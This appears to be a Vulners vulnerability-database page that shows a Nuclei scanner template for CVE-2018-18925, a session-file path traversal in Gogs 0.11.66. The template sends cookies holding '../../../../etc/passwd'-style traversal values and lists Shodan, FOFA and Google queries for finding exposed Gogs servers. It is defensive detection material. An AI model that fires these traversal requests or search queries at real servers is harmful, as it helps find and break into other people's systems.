Vulners
Lucene search
Gogs (Go Git Service) 0.11.66 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for Session Fixation in Gogs | 12 Sep 202117:57 | – | githubexploit |
| Exploit for Session Fixation in Gogs | 12 Sep 202117:57 | – | githubexploit |
 | Gogs Remote Code Execution Vulnerability | 6 Nov 201800:00 | – | cnvd |
 | CVE-2018-18925 | 4 Nov 201806:00 | – | cve |
 | CVE-2018-18925 | 4 Nov 201806:00 | – | cvelist |
 | EUVD-2022-3398 | 3 Oct 202520:07 | – | euvd |
 | CVE-2018-18925 | 4 Nov 201805:29 | – | nvd |
 | Gogs < 0.11.79 Multiple Vulnerabilities | 13 Nov 201800:00 | – | openvas |
 | CVE-2018-20303 | 20 Dec 201800:29 | – | osv |
| GHSA-9HXG-W7QF-HH93 Gogs Directory Traversal | 14 May 202201:37 | – | osv |
10
id: CVE-2018-18925
info:
name: Gogs (Go Git Service) 0.11.66 - Remote Code Execution
author: princechaddha
severity: critical
description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: This issue will be fixed by updating to the latest version of Gogs.
reference:
- https://www.anquanke.com/post/id/163575
- https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925
- https://nvd.nist.gov/vuln/detail/cve-2018-18925
- https://github.com/gogs/gogs/issues/5469
- https://github.com/j4k0m/CVE-2018-18925
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-18925
cwe-id: CWE-384
epss-score: 0.31882
epss-percentile: 0.98084
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: gogs
product: gogs
shodan-query:
- cpe:"cpe:2.3:a:gogs:gogs"
- http.title:"sign in - gogs"
fofa-query: title="sign in - gogs"
google-query: intitle:"sign in - gogs"
tags: cve,cve2018,gogs,lfi,rce,vulhub,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd;
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: lang=en-US; i_like_gogits=../../../../etc/dummy;
matchers:
- type: dsl
dsl:
- 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")'
# digest: 490a0046304402202faba5d318a5f6880aaaef007b530bdbdba2d3c4f0b89e807fffed5cd2ab4ac702201f11fd446414d810bac82c34a7b0914950d1f9cbb83e5b679b85c8060fc8964f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 27.5
CVSS 39.8
EPSS0.31882